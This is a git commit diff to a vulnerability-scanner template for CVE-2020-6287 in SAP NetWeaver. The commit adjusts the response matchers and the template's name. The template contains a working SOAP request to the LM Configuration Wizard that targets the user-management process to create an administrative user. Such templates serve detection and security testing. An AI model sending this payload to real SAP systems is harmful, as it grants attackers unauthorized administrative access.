Improved matchers for CVE-2020-6287
parent
91b33eb6a5
commit
55c0e1b103
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: Remotely Exploitable Code On NetWeaver
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
|
||||
|
@ -11,6 +11,7 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
|
@ -23,12 +24,16 @@ requests:
|
|||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
@ -36,4 +41,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
|
Loading…
Reference in New Issue